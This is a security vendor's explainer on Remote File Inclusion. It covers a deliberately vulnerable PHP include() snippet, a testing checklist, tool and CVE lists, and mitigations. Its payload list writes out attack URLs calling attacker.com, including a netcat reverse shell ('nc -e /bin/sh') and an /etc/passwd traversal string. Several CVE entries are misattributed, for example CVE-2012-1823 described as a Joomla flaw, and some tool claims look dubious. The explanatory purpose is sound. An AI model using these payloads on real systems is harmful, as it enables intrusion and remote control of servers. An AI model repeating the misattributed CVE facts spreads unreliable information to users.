20 Jan, 2023

Remote file include

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

RFI (Remote File Inclusion) vulnerability is a type of web vulnerability that allows an attacker to include a remote file on a vulnerable web page, usually through a script or other dynamic content. The included file can be a malicious file, such as a script that contains malware or a web shell, which can be used to take over the vulnerable server or steal sensitive information. RFI vulnerabilities are often caused by poor input validation and can be exploited by crafting a specially crafted URL that includes a URL pointing to the attacker’s malicious file.

RFI vulnerabilities are often caused by poor input validation on the server-side of web applications. When a web application receives user input, it should validate that input to ensure that it is safe to use. However, if the validation is not done properly, an attacker may be able to craft a specially crafted URL that includes a URL pointing to the attacker’s malicious file.

Examples of remote file vulnerabilities

Here are a few examples of how an attacker might exploit a Remote File Inclusion (RFI) vulnerability:

1. Injecting a URL that points to a malicious file hosted on a server under the attacker’s control:

An attacker discovers a vulnerable website with a script that includes a file based on a user-supplied parameter.

The attacker crafts a URL that includes the parameter and points to a file on a server under their control.

When a user visits the attacker’s crafted URL, the script on the vulnerable website will include the attacker’s malicious file, which could contain malware or a web shell.

2. Injecting a URL that points to a file on the local file system of the server, to read sensitive information:

An attacker finds a vulnerable website that includes a file based on a user-supplied parameter.

The attacker crafts a URL that includes the parameter and points to a sensitive file on the server’s local file system.

The script on the vulnerable website will include the sensitive file, allowing the attacker to read its contents.

3. Injecting a URL that points to a file on a different server that the attacker has compromised:

An attacker gains access to a different server and uploads a web shell.

The attacker discovers a vulnerable website that includes a file based on a user-supplied parameter.

The attacker crafts a URL that includes the parameter and points to the web shell on the compromised server.

When a user visits the attacker’s crafted URL, the script on the vulnerable website will include the web shell, giving the attacker access to the vulnerable server.

It’s important to note that these are just a few examples and attackers can use RFI vulnerabilities in many different ways depending on the specific vulnerability and the attacker’s goals.

An example of vulnerable code that is susceptible to a remote file include (RFI) vulnerability is as follows:

				
					<?php
$file = $_GET['file'];
include($file);
?>
				
			

In this example, the script takes the value of the “file” parameter in the GET request and includes it as a file. An attacker could exploit this vulnerability by sending a request with a malicious file path, such as “http://example.com/vulnerable_script.php?file=http://attacker.com/malicious_code.php“, which would cause the server to execute the code in malicious_code.php.Privilege escalation techniques.

Privilege escalation techniques

A Remote File Include (RFI) vulnerability can be used for privilege escalation if an attacker can use it to execute code with higher privileges than their own. This can happen in a number of ways, depending on the specific configuration of the system and the web application. Here are a few examples:

  • The web application is running with the privileges of the web server user (e.g. “www-data” or “apache”). If an attacker can exploit an RFI vulnerability to execute code, they will also have the privileges of the web server user. If the web server user has access to sensitive files or system resources, the attacker may be able to access or modify them.

  • The web application is running with higher privileges than the web server user. If an attacker can exploit an RFI vulnerability to execute code, they will also have the privileges of the application. If the application has access to sensitive files or system resources, the attacker may be able to access or modify them.

  • The web application is running on a system with weak file permissions. If an attacker can exploit an RFI vulnerability to execute code, they may be able to access or modify files that they would not normally have access to.

  • The web application is running on a system with weak user permissions. If an attacker can exploit an RFI vulnerability to execute code and they are able to gain the privileges of a user with higher permissions, they can access or modify system resources.

General methodology and checklist for testing for remote include vulnerabilities

Testing for a Remote File Include (RFI) vulnerability involves identifying inputs in a web application that are used to include files from external sources, and attempting to manipulate those inputs to include malicious files. Here is a general methodology for testing for an RFI vulnerability:

  1. Identify inputs that are used to include files: Look for any variables or parameters in the application’s code that are used to include files, such as $_GET[‘file’], $_POST[‘file’], or $_REQUEST[‘file’]. Pay attention to include(), require(), include_once(), and require_once() statements.

  2. Test for basic RFI: Attempt to include files from external sources using the identified inputs. For example, if a script has a parameter called “file” that is used to include a file, try passing a URL to an external file as the value of the “file” parameter. For example, “http://example.com/vulnerable_script.php?file=http://attacker.com/malicious_code.php

  3. Test for RFI with null byte injection: Attempt to include files from external sources by injecting a null byte into the file path. This can be done by appending a “%00” or “\0” to the file path. This can be used to bypass certain types of filtering or validation.

  4. Test for LFI: Attempt to include local files on the server, by passing “file” parameter with “../../../../etc/passwd” or other sensitive local files on the server.

  5. Test for RFI with query string manipulation: Attempt to include files from external sources by manipulating the query string. For example, if a script has a parameter called “file” that is used to include a file, try passing a URL to an external file as the value of the “file” parameter, with additional parameters appended.

  6. Analyze the response for any suspicious behavior, such as error messages, file not found, or any other unusual behavior.

  7. Repeat the above steps for each identified input that is used to include files.

Tools set for exploiting localfile includ vulnerabilities

There are various tools available that can be used to automate the process of testing for Remote File Include (RFI) vulnerabilities. Here are a few examples:

  1. Metasploit – Metasploit is a popular penetration testing framework that includes modules for testing RFI vulnerabilities. The modules can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  2. Burp Suite – Burp Suite is a web application security testing tool that includes a scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  3. w3af – w3af is a web application security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  4. sqlmap – Sqlmap is a tool that can detect and exploit SQL injection vulnerabilities, but it also has the ability to detect and exploit RFI vulnerabilities. It allows you to specify a parameter and test for RFI vulnerabilities using a tamper script.

  5. Vega – Vega is a web security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  6. OWASP ZAP – OWASP ZAP is an open-source web application security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  7. Nessus – Nessus is a vulnerability scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  8. Nmap – Nmap is a network scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  9. Nikto – Nikto is a web server scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  10. OpenVAS – OpenVAS is a vulnerability scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  11. Core Impact – Core Impact is a commercial penetration testing tool that can detect RFI vulnerabilities. The tool can be configured to identify inputs that are used to include files and attempt to include malicious files.

  12. Acunetix – Acunetix is a commercial web application security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files

  13. WebCruiser – WebCruiser is a web vulnerability scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

Top CVES Common Vulnerabilities

There are several Common Vulnerabilities and Exposures (CVEs) related to Remote File Include (RFI) vulnerabilities. Here are a few examples of some high-severity RFI related CVEs:

CVE-2012-1823: This vulnerability affected Joomla! 1.5, and it allowed remote attackers to execute arbitrary code via a URL in the template parameter to index.php.

CVE-2012-2311: This vulnerability affected the Simple Machines Forum (SMF) package, it allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the loadLanguage function in Sources/Subs.php.

CVE-2012-1577: This vulnerability affected the Vtiger CRM package, it allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the config.inc.php file.

CVE-2011-3152: This vulnerability affected the Joomla! package, it allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the template parameter to index.php.

CVE-2011-2505: This vulnerability affected the phpMyAdmin package, it allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the lang parameter to libraries/select_lang.lib.php.

CVE-2011-4885: This vulnerability affected the PHP-Fusion package, it allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the theme parameter to themes.php.

CVE-2010-3872: This vulnerability affected the phpMyAdmin package, it allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the GLOBALS[cfg][Servers][host] parameter to libraries/config.

Remote include vulnerability exploits

  • Metasploit RFI module: The Metasploit framework includes a module that can be used to exploit RFI vulnerabilities. The module automates the process of identifying inputs that are used to include files and attempting to include malicious files.

  • rfi-scan-tool: This is a simple command line tool that can be used to scan web applications for RFI vulnerabilities. It can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  • rfi-exploit: This is a Perl script that can be used to exploit RFI vulnerabilities. It can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  • RFI Shell: This is a tool that can be used to exploit RFI vulnerabilities and gain shell access to a vulnerable system.

  • rfi-lite: This is a tool that can be used to exploit RFI vulnerabilities by injecting PHP code into a web page.

  • rfi-scan: This is a simple script that can be used to scan web applications for RFI vulnerabilities. It can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  • RFI Exploiter: This is a tool that can be used to exploit RFI vulnerabilities and gain shell access to a vulnerable system.

  • RFI Tookit: This is a collection of scripts and tools that can be used to exploit RFI vulnerabilities.

These are some of the popular RFI exploit tools available, but it’s worth noting that there may be other tools available and also that many of these tools may not be updated and therefore may not work against the latest vulnerabilities.

Practicing in test for remote include vulnerability

  1. Manually: One way to test for RFI vulnerabilities is to manually review the source code of web applications to identify inputs that are used to include files. You can then attempt to include malicious files to see if the application is vulnerable.

  2. Automated Tools: There are several automated tools available that can be used to test for RFI vulnerabilities. These tools can be configured to identify inputs that are used to include files and attempt to include malicious files. Some of these tools include Metasploit, rfi-scan-tool, rfi-exploit, RFI Shell, rfi-lite, rfi-scan and RFI Exploiter.

  3. Penetration Testing: Penetration testing is a method of evaluating the security of a system by simulating an attack by a malicious actor. During a penetration test, a tester will attempt to exploit RFI vulnerabilities in the target system to gain unauthorized access or execute arbitrary code.

  4. Online web application scanner: Some online web application scanner services can be used to test for RFI vulnerabilities, these services can be configured to identify inputs that are used to include files and attempt to include malicious files.

  5. Bug Bounty programs: Many organizations have a bug bounty program that rewards security researchers for responsibly disclosing vulnerabilities. It’s a good idea to check if the company you’re interested in has a program running and submit a report if you find any RFI vulnerabilities

For study remote include vulnerability

There are several resources available to learn more about Remote File Include (RFI) vulnerabilities, including courses, practice environments, and videos. Here are a few examples:

Courses:

OWASP Web Application Security Essentials – this course covers the basics of web application security and includes information on RFI vulnerabilities and how to prevent them.

SANS Institute – Web Application Penetration Testing and Ethical Hacking – this course covers the methodology and techniques used to test web applications for vulnerabilities, including RFI vulnerabilities.

Practice Environments:

OWASP WebGoat – this is a deliberately vulnerable web application that can be used to learn about common web application vulnerabilities, including RFI vulnerabilities.

HackTheBox – an online penetration testing platform where you can practice and improve your skills in a safe and legal environment.

Vulnhub – a platform that provides vulnerable virtual machines, which can be used to learn about various types of vulnerabilities, including RFI vulnerabilities.

Videos:

OWASP Top Ten Proactive Controls – this video series covers the OWASP Top Ten Proactive Controls, a set of guidelines for secure software development, including information on RFI vulnerabilities and how to prevent them.

Web Application Hacking – a video series that covers various types of web application vulnerabilities, including RFI vulnerabilities.

Hackersploit – a YouTube channel that provides information and tutorials on various topics related to hacking and cyber security, including RFI vulnerabilities.

Books with review of remote include vulnerability

  • “Web Application Hacker’s Handbook” – This book is a comprehensive guide to finding and exploiting security vulnerabilities in web applications. It covers RFI vulnerabilities in detail and provides step-by-step instructions for exploiting them. Reviewers have praised the book for its in-depth coverage of web application security and its practical, hands-on approach.

  • “The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws” – This book provides a thorough understanding of how web applications work and how to find and exploit security vulnerabilities in them. It covers RFI vulnerabilities and provides detailed examples of how to exploit them. Reviewers have praised the book for its clear explanations and practical examples.

  • “Hacking: The Art of Exploitation” – This book covers a wide range of topics related to hacking and exploitation, including RFI vulnerabilities. It provides a detailed explanation of how RFI vulnerabilities work and how to exploit them. Reviewers have praised the book for its clear explanations and practical examples.

  • “Black Hat Python: Python Programming for Hackers and Pentesters” – This book covers the use of Python for hacking and penetration testing, including RFI vulnerabilities. It provides detailed examples of how to write Python scripts to exploit RFI vulnerabilities. Reviewers have praised the book for its clear explanations and practical examples.

  • “The Hacker Playbook 3: Practical Guide To Penetration Testing” – This book provides a comprehensive guide to penetration testing and includes information on RFI vulnerabilities. It provides a detailed explanation of how RFI vulnerabilities work and how to exploit them. Reviewers have praised the book for its clear explanations and practical examples.

List of payloads suitable for vulnerability

When exploiting a Remote File Include (RFI) vulnerability, payloads are used to execute arbitrary code on the target system. Here are a few examples of payloads that are commonly used for RFI attacks:

  1. PHP Code Injection: Injecting PHP code directly into the vulnerable parameter, for example: “http://example.com/index.php?file=php://input&cmd=system(‘id‘)”

  2. File Upload: Uploading a malicious PHP file to the target system and then including it using the RFI vulnerability. For example, uploading a file named “shell.php” and then including it using “http://example.com/index.php?file=http://attacker.com/shell.php

  3. Reverse Shell: Connecting to a remote host and then using the RFI vulnerability to include a script that will run a reverse shell on the target system. For example, “http://example.com/index.php?file=http://attacker.com/reverse.php

  4. Metasploit: Using the Metasploit Framework to generate a payload and then including it using the RFI vulnerability.

  5. Netcat: Using netcat to open a shell and then include the command to execute it. For example: “http://example.com/index.php?file=http://attacker.com/nc.php&cmd=nc -e /bin/sh [attacker_ip] [attacker_port]”

It’s worth noting that payloads can vary and depend on the specific RFI vulnerability, the type of the web application, and the environment it’s running on. Additionally, it’s important to remember that these payloads are used for malicious purposes and should not be used without permission or in a legal way.

How to be protected from remote include vulnerability

Sigma and firewall rules can be used to detect and block Remote File Include (RFI) vulnerabilities. Here are a few examples of Sigma rules and firewall rules that can be used to detect and block RFI attacks:

Sigma rules:

Detecting RFI attacks using Sigma, a rule language for log analytics, can be used to detect RFI attacks by looking for specific patterns in log files. For example, a Sigma rule can be used to detect requests that contain the “http:” or “ftp:” string in the file parameter.

Firewall rules:

Blocking RFI attacks using firewall rules can be done by blocking all incoming requests that contain specific strings in the file parameter. For example, a firewall rule can be used to block all incoming requests that contain the “http:” or “ftp:” string in the file parameter.

Using mod_security, a web application firewall, to block RFI attacks by configuring it to detect and block any requests that contain specific strings in the file parameter.

Using a Web Application Firewall (WAF) to block RFI attacks, the WAF can be configured to detect and block any requests that contain specific strings in the file parameter.

Mitigations for remote include vulnerability

There are several ways to mitigate Remote File Include (RFI) vulnerabilities:

  1. Input validation: One of the most effective ways to prevent RFI attacks is to validate user input. This can be done by checking that the input only contains expected characters and data types, and rejecting any input that does not meet these criteria.

  2. File extension validation: Validate the file extension of the file being included, and only allow certain file types, such as .php, .html, etc.

  3. Use of Whitelists: A whitelist of allowed URLs or IP addresses can be used to limit the scope of the RFI vulnerability. This can be done by only allowing specific URLs or IP addresses to be included, and blocking all other requests.

  4. Disable Remote URL Includes: Some servers and frameworks have the ability to disable remote URL includes, which can be done by disabling the allow_url_include or allow_url_fopen options in PHP.

  5. Sanitize user input: Use functions such as filter_var() and htmlspecialchars() to sanitize user input and remove any malicious code before it is used.

  6. Keep your software updated: Regularly update your software, including web servers and web applications, to ensure that any known RFI vulnerabilities are patched.

  7. Use a WAF: Use a web application firewall (WAF) that can detect and block RFI attacks.

It’s worth noting that RFI vulnerabilities can be difficult to detect and exploit and that a combination of these mitigation techniques is recommended. Additionally, regular security assessments and penetration testing can help identify and remediate RFI vulnerabilities.

Conclusion

Remote File Include (RFI) vulnerabilities allow an attacker to include a remote file, such as a PHP script, in the application. This can allow an attacker to execute arbitrary code on the target system, leading to a range of potential impacts. To prevent RFI vulnerabilities, it is important to use a combination of mitigation techniques such as input validation, file extension validation, whitelists, disabling remote URL includes, sanitizing user input, keeping software updated, and using a web application firewall (WAF). Regular security assessments and penetration testing can also help identify and remediate RFI vulnerabilities.

Other Services

Ready to secure?

Let's get in touch